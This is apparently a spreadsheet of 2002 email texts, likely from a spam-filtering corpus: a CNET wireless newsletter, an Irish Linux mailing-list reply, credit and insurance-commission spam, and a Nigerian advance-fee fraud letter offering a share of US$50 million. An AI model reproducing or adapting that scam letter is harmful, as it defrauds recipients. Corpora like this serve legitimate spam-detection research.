             &lt;img src=3D"http://iiq.us/images/insurmark/20020718-5.gif" =
 width=3D"200" height=3D"55"&gt;=20
             &lt;br&gt;&amp;nbsp;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&lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_86B25_01C22F3F.3AF11B40--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Cell Phone Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/wr/442_cellphone_nwsltr.gif" width="442" height="60" border="0" alt="CNET Wireless Dispatch"&gt;&lt;br&gt;
 	&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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 shopping  --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOs8dNuIYkCs3CyJqsjeorR" target="new"&gt;   
 &lt;img src="http://view.atdmt.com/AVE/view/aws05000012ave/direct;wi.160;hi.600/01/" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /shopping --&gt;
 	&lt;br&gt;&lt;!-- right column content --&gt;
 	&lt;!-- search form --&gt;
 	&lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 		&lt;form method="get" action="http://www.search.com/redirect"&gt;
 		&lt;tr valign=top&gt;&lt;td&gt;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value="http://wireless.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;Wireless
  			&lt;option value="http://cnet.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;All CNET
  			&lt;option value="http://www.search.com/search?tag=ex.wireless.dispatch.srch.web"&gt;The Web
 			&lt;/select&gt;&amp;nbsp;
 			&lt;input type=submit value="Go!"&gt;&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 		&lt;/form&gt;
 	&lt;/table&gt;&lt;p&gt;
 	&lt;!-- /search form --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;&lt;img src="http://home.cnet.com/i/dp/dd_c.gif"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
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section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
 			&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;!-- td width=252&gt; --&gt;&lt;td width=150&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
 			&lt;font face="Arial, Helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="4" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=170&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h1"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h1"&gt;Cordless phones: the other wireless devices&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h2"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h2"&gt;Samsung SPH-A460&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td width=15&gt;&lt;a href="#h3"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 						&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h3"&gt;What phones are hot in Asia--updated&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;	
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=1 bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=240&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
 				&lt;div style="padding: 8px 0px 8px"&gt;&lt;font size="-1"&gt;&lt;b&gt;Wireless Top 5s&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 					&lt;ul&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=09-joDSIj8jsk9his8LYSS7ZMgtY8lR" &gt;Top 5 AT&amp;T Wireless cell phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPx9j-7tPqEsB8LE27qd4R" &gt;Top 5 Sprint PCS phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjcJokhsUgz6yClxb-7XsrR" &gt;Top 5 Verizon Wireless cell phones&lt;/a&gt;
 				&lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVs_7VN_Xl_kj2ZBSJuRR" &gt;All Top 5s&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;
 				&lt;img src="http://home.cnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 		&lt;tr valign=top&gt;&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=5d-JN-bIK0w8sxTOwBobvZm5yGKIaZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/042502mpsplayers.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUeno9qCzfrqMtNXjoCKqdR" &gt;&lt;b&gt;Next-generation MP3 players&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;These three hard drive-based MP3 players turn last year's models into paperweights.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8n4W11B-hleplrQ8kasp4eR" &gt;Mojo rising: TDK's new MP3 CD player&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanVDf4DloYlXdIl9Oi-UiyR" &gt;The Nomad Jukebox 3 breaks new ground&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;MP3 &amp;amp; Audio&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0MIpriPYUr9i_f_B0NLnlR" &gt;Creative Labs Nomad Jukebox 3&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPPHrPhpi7NWtUoF24wxeeR" &gt;Digitalway MPIO-DMK (128 MB)&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0LQvq0arTSBz6gEwTinhlyR" &gt;Bantam Interactive Explor BA350&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsTLuoIfIMH3XX8owMnerlR" &gt;iRiver SlimX iMP-350&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI481hKhaT6Hmap_vCgSyiL4R" &gt;Sonicblue Rio Volt SP250&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N1z0zxtloQ1U5MauO37xrR" &gt;See all most popular&lt;/a&gt;&lt;/b&gt;&lt;br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
 &lt;!-- /Leads Module --&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 	&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;			
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/lx/sub_rev.gif" alt="Reviews &amp; Features" width="200" height="19" border="0"&gt;&lt;br&gt;
 		&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br /&gt;
 &lt;!--item 1--&gt;		
 &lt;a name="h1"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrPLwAEz718IeOdSKzjX1iR" &gt;Cordless phones: the other wireless devices&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 In the market for a new cordless phone but don't know 
 whether to buy a 900MHz or 2.4GHz model or what manufacturer 
 offers the best product? No sweat--check out our new line 
 coverage to find the phone that fits your personal style 
 and needs.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKBij6bgZak-EDvznhjonlZR" &gt;Read the reviews&lt;/a&gt; &lt;!-- &amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdKP6JGV24YOLpk6Td6dR" &gt;Notify me when this is available&lt;/a&gt; --&gt;&lt;/b&gt;
 &lt;br clear="all"&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--item 2--&gt;
 &lt;a name="h2"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdpiybZfgomKns2asfI8UkRR" &gt;Samsung SPH-A460&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The update to the SPH-A400 offers some cool enhancements, 
 such as an external LCD. Is this the flip phone of the 
 moment for Sprint PCS service? 
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KreJD6Vn_af70SVbToBBPR" &gt;Read the review&lt;/a&gt;
 &amp;nbsp;&amp;#124;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMpSkCDs08Figi7yr9FKgnR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- center1 --&gt;
 &lt;!-- /center1 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;a name="h3"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=af--dB8QLp7D-ceh8YydDX7NdmUVSeR" &gt;What phones are hot in Asia--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Wonder what people are talking on over on the other side 
 of the Pacific? Check out the most current top 10 list from 
 our sister site in Singapore.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WstJ9ENoukHF6q-jPexAyR" &gt;See the list&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;
 &lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 	&lt;TBODY&gt;&lt;TR vAlign=top&gt;
     	&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
             &lt;UL&gt;&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPspJB07a4ie23s1N87hJlR" &gt;Live tech help; submit your question now&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDDxi06jsO0QzbMuLbLad4R" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIxo0mMdhKQcaLlAI6OrR" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=18-WhdzI987phkswbgTiMEyR1N675iR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKxNl5DhZgVdngyV7VDjSPR" &gt;May Editors' Choice award: Pioneer's home-theater system, the HTS-910DV&lt;/A&gt; 
 			&lt;/UL&gt;
 			&lt;/B&gt;&lt;/FONT&gt;
 		&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 &lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 	&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- &lt;br&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="30" border="1"&gt;&lt;br&gt; --&gt;
 &lt;/td&gt;&lt;/tr&gt;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is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=43-coY5zNJRL1zD_lgTZI_0XxbpK39OTdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJxs_imtwDYjKHbtbXYzHRR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEzJC842xE7Bc1bJBykEmZR"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href="http://clickthru.online.com/Click?q=82-P0EYQXK2G6PdEh46gJLkjCXMZHnR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M2Zi6YKdT3V0z6qjySJGeR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UJo8PwZwydWfGJ0kSyVjyR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpW7B441TXEwiOPYOLipujlR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6zs43rnOIRzw0LGkk4R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDTzhBV2Pedo6MzbuNK5xrR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e459&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=01-9oQDnEjoOqM_8eC3hPwESegnYsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; An old laptop would probably be ideal.  That way, it comes with its own 
 &gt; UPS (the battery).
 D'oh. I ment to say that I cant use a laptop, as I have a pci wireless
 card and the cable for it (about 180 dollars). So it has to be a pc, with
 a pci 2.2 connector (ie some pentiums, and anything above)
  &gt; 
 &gt; Some people strip down old 486 boxes, take out the hard drive, disable
 &gt; the fans, and run the thing from just a floppy drive or a CDR you've
 &gt; burned for the purpose.  
 I'd do that with my 166, but the psu has a fan. And a 486 wont support my
 wireless card :( I know. I'm awkward,
           Greg
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">BARRISTER ADEWALE COKER CHAMBERS
 Legal Practitioners / Notary Public
 Blk 804- Law House Building
 Lagos-Nigeria.
 For your kind attention,
               REQUEST FOR ASSISTANCE
 It is my humble pleasure to write you this letter irrespective of the fact that you do not know me.  However,I am in search of a reliable and trustworthy person that can handle a confidential transaction of this nature.
 I am BARRISTER ADEWALE COKER, a family lawyer to our former military rule,General Sani Abacha who died suddenly in power some years ago. Since his untimely demise, the family has suffered a lot of harassment from the regimes that succeeded him.  The regime and even the present civilian government are made up of Abacha's enemies.Recently, the wife was banned from traveling outside Kano State their home state as a kind of house arrest and the eldest son still in detention.Although, a lot of money have been recovered from Mrs. Abacha since the death of her husband by the present government, there's still huge sums of money in hard currencies that we have been able to move out of the country for safe keeping to the tune of US$50 million.This money US$50 Million is already in North American and if you are interested,we will prepare you as the beneficiary of the total funds,and you will share 25% of the total funds after clearance from the Security Compan!
 y.
 Note, there is no risk involved in this project because l am involved as Abacha's confidant.Please you should keep this transaction a top secret and we are prepared to do more business with you pending your approach towards this project.I await your urgent response.Thanks.
 Yours Faithfully
 BARRISTER ADEWALE COKER.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Need a Credit Card?
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Need a Credit Card? We'll get One for You!
 http://www.adclick.ws/p.cfm?o=114&amp;s=pk01
 2)) Auto Loans, Fast Approvals for Any Credit!
 http://www.adclick.ws/p.cfm?o=383&amp;s=pk1
 2) Are You Paying Too Much for Auto Insurance - Find Out?
 http://www.adclick.ws/p.cfm?o=334&amp;s=pk1
 3) Get Your Free Credit Report!
 http://www.adclick.ws/p.cfm?o=322&amp;s=pk1
 Have a wonderful day,
 Offer Manager
 PrizeMama
 ------------------
 You are receiving this email because you have opted-in to receive
 email from publisher: prizemama.  To unsubscribe, click below:
 http://u2.azoogle.com/?z=93-1090346-62lLC4
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 35% Lifetime Renewals - Unbeatable Product!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_C9DC9_01C230C6.21818770
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Unbeatable Product...Unbeatable Commissions!=09
  LegalIQ - America's Premier Discount Legal Services Program=09
  NO License Required=0A=
 There are NO Start-Up Fees=0A=
 This is NOT Multilevel
 Marketing=09
  First Year Commission: 40%=0A=
 Lifetime Renewal Commissions: Up to 35%=09
 Don't forget to visit our web site! &lt;http://www.legaliq.info&gt;  =09
  	 Please fill out the form below for
 Contracting Information and Marketing Supplies =09
 First Name:	  =09
 Last Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 Address:	  =09
 Address2:	  =09
 City:	 	 State:	 	 Zip:	 	  	=20
  	    =09
 =20
  LegalIQ - Part of the IQ Group of Companies=09
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;=20
 ------=_NextPart_000_C9DC9_01C230C6.21818770
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;35% Lifetime Renewals - Unbeatable Product!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#999999" text=3D"#000000" link=3D"#00CC00" =
 vlink=3D"#FFCC00"&gt;
 &lt;p align=3D"center"&gt;=20
   &lt;table width=3D"553" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#003399"&gt;
     &lt;tr&gt;
       &lt;td bgcolor=3D"#FFFFFF"&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/legaliq/top.jpg" =
 width=3D"550" height=3D"268" alt=3D'Unbeatable Product...Unbeatable =
 Commissions!'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/legaliq/logo.jpg" width=3D"404" =
 height=3D"147" alt=3D"LegalIQ - America's Premier Discount Legal =
 Services Program"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/legaliq/no2.gif" width=3D"359" =
 height=3D"113" alt=3D'NO License Required&amp;#10;There are NO Start-Up =
 Fees&amp;#10;This is NOT Multilevel Marketing'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/legaliq/ani2.gif" width=3D"389" =
 height=3D"164" alt=3D'First Year Commission: 40%&amp;#10;Lifetime Renewal =
 Commissions: Up to 35%'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#FFFFFF" align=3D"center"&gt;
               &lt;br&gt;
               &lt;table width=3D"468" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"7" height=3D"34" bordercolor=3D"#993333"&gt;
                 &lt;tr&gt;=20
                   &lt;td bgcolor=3D"#003399" align=3D"center"&gt;
                     &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;
                     Don't forget to visit our &lt;a =
 href=3D"http://www.legaliq.info"&gt;&lt;font color=3D"#66FF00"&gt;web=20
                     site!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;
                             &lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                             Please fill out the form below for&lt;br&gt;
                             Contracting Information and Marketing =
 Supplies&lt;/b&gt;&lt;/font&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;First Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"Firstname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;Last Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"Lastname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;Address:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"address" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
